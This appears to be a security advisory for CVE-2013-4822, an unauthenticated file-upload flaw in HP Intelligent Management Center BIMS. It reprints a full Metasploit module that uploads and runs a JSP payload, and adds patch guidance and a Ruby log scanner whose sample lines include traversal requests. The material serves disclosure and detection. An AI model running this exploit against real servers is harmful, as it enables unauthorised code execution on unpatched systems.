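Multiple HP Products Remote Code Execution Vulnerability (CVE-2013-4822)
Release date: 2013-10-08
Updated: 2013-10-23
Affected systems:
HP Intelligent Management Center (IMC) 5.2
Description:
BUGTRAQ ID: 62895
CVE(CAN) ID: CVE-2013-4822
Hewlett-Packard (HP) is a global technology solutions provider serving individual users, businesses of all sizes, and research institutions. HP's products cover IT infrastructure, personal computing and access devices, global services, and printing and imaging for consumers and businesses of all sizes.
HP Intelligent Management Center (iMC), the HP IMC Branch Intelligent Management System software module (BIMS), Comware routers and switches, and other products contain a remote code execution vulnerability that allows an attacker to execute arbitrary code in the context of the affected application. The flaw is in the UploadServlet within the Branch Intelligent Management Module. The servlet can be accessed without authentication and can be used to write files to the server.
<*Source: Andrea Micalizzi aka rgod
Links: http://www.zerodayinitiative.com/advisories/ZDI-13-238/
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03943425
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!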
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'HP Intelligent Management Center BIMS UploadServlet Directory Traversal',
      'Description' => %q{
        This module exploits a directory traversal vulnerability on the version 5.2 of the BIMS
        component from the HP Intelligent Management Center. The vulnerability exists in the
        UploadServlet, allowing the user to download and upload arbitrary files. This module has
        been tested successfully on HP Intelligent Management Center with BIMS 5.2 E0401 on Windows
        2003 SP2.
      },
      'Author'      =>
        [
          'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
          'juan vazquez' # Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2013-4822' ],
          [ 'OSVDB', '98247' ],
          [ 'BID', '62895' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-238/' ],
          [ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03943425' ]
        ],
      'Privileged'  => true,
      'Platform'    => 'win',
      'Arch'        => ARCH_JAVA,
      'Targets'     =>
        [
          [ 'HP Intelligent Management Center 5.1 E0202 - 5.2 E0401 / BIMS 5.1 E0201 - 5.2 E0401 / Windows', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Oct 08 2013'))

    register_options(
      [
        Opt::RPORT(8080)
      ], self.class)
  end

  def check
    res = send_request_cgi({
      'uri'    => normalize_uri("/", "upload", "upload"),
      'method' => 'GET',
      'vars_get' => { 'fileName' => "WEB-INF/web.xml" },
    })

    if res.nil?
      print_error("Unable to determine, because the request timed out.")
      return Exploit::CheckCode::Unknown
    end

    if res.code == 200 and res.headers['Content-Type'] =~ /application\/doc/ and res.body =~ /com\.h3c\.imc\.bims\.acs\.server\.UploadServlet/
      return Exploit::CheckCode::Vulnerable
    elsif res.code == 405 and res.message =~ /Method Not Allowed/
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    # New lines are handled on the vuln app and payload is corrupted
    #jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "")
    jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"

    print_status("#{peer} - Uploading the JSP payload...")
    res = send_request_cgi({
      'uri'    => normalize_uri("/", "upload", "upload"),
      'method' => 'PUT',
      'vars_get' => { 'fileName' => jsp_name },
      'data' => payload.encoded
    })

    if res and res.code == 200 and res.body.empty?
      print_status("#{peer} - JSP payload uploaded successfully")
      register_files_for_cleanup("..\\web\\apps\\upload\\#{jsp_name}")
    else
      fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed")
    end

    print_status("#{peer} - Executing payload...")
    send_request_cgi({
      'uri'    => normalize_uri("/", "upload", jsp_name),
      'method' => 'GET'
    }, 1)
  end
end
Recommendations:
Vendor patch:
HP
--
HP has released a security bulletin (HPSBGN02929) and corresponding patches for this issue:
HPSBGN02929: HP Intelligent Management Center (iMC), HP IMC Branch Intelligent Management System Software Module (BIMS), and Comware Based Switches and Routers, Remote Code Execution, Disclosure of Information
Link: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03943425
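Until the patch is applied, web access logs can be reviewed for use of the unauthenticated UploadServlet described above. The following is an added example, not part of the original advisory or of the Metasploit project: it flags requests to /upload/upload and later requests for files written through it. The Tomcat common access-log layout is an assumption, the sample log lines are constructed, and the function names are hypothetical.

```ruby
require 'uri'

# Constructed sample in Tomcat common access-log format (not real traffic).
SAMPLE_LOG = <<~LOG
  198.51.100.7 - - [08/Oct/2013:10:00:01 +0000] "GET /upload/upload?fileName=WEB-INF/web.xml HTTP/1.1" 200 1432
  198.51.100.7 - - [08/Oct/2013:10:00:05 +0000] "PUT /upload/upload?fileName=aB3dE9.jsp HTTP/1.1" 200 0
  198.51.100.7 - - [08/Oct/2013:10:00:06 +0000] "GET /upload/aB3dE9.jsp HTTP/1.1" 200 0
  192.0.2.10 - - [08/Oct/2013:10:01:00 +0000] "GET /imc/login.jsf HTTP/1.1" 200 5120
  192.0.2.11 - - [08/Oct/2013:10:02:00 +0000] "PUT /upload/upload?fileName=..%5Cconf%5Cx.txt HTTP/1.1" 404 0
LOG

# Captures: client, method, request target, status (log layout is an assumption).
LINE_RE = /\A(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) /

# Decode the fileName query parameter; fall back to the raw query if malformed.
def file_name_param(query)
  URI.decode_www_form(query.to_s).to_h['fileName'].to_s
rescue ArgumentError
  query.to_s
end

# Returns one hash per suspicious request: any request to the UploadServlet,
# and any later GET of a file that was written through it.
def scan_bims_upload(log_text)
  uploaded = {} # file name written via PUT => client address
  findings = []
  log_text.each_line do |line|
    m = LINE_RE.match(line)
    next unless m
    client, method, target, status = m[1], m[2], m[3], m[4].to_i
    path, query = target.split('?', 2)
    if path == '/upload/upload'
      name = file_name_param(query)
      kind = if status != 200 then :probe
             elsif method == 'PUT' then :file_write
             elsif method == 'GET' then :file_read
             else :other
             end
      uploaded[name] = client if kind == :file_write
      findings << { client: client, kind: kind, file: name,
                    traversal: name.include?('..') }
    elsif method == 'GET' && path.start_with?('/upload/') &&
          uploaded.key?(path.sub(%r{\A/upload/}, ''))
      findings << { client: client, kind: :uploaded_file_requested,
                    file: path, traversal: false }
    end
  end
  findings
end

scan_bims_upload(SAMPLE_LOG).each { |f| puts f.inspect } if __FILE__ == $PROGRAM_NAME
```

A :file_write followed by :uploaded_file_requested from the same client is the sequence to triage first; on a patched or unaffected host, requests to /upload/upload should not return 200.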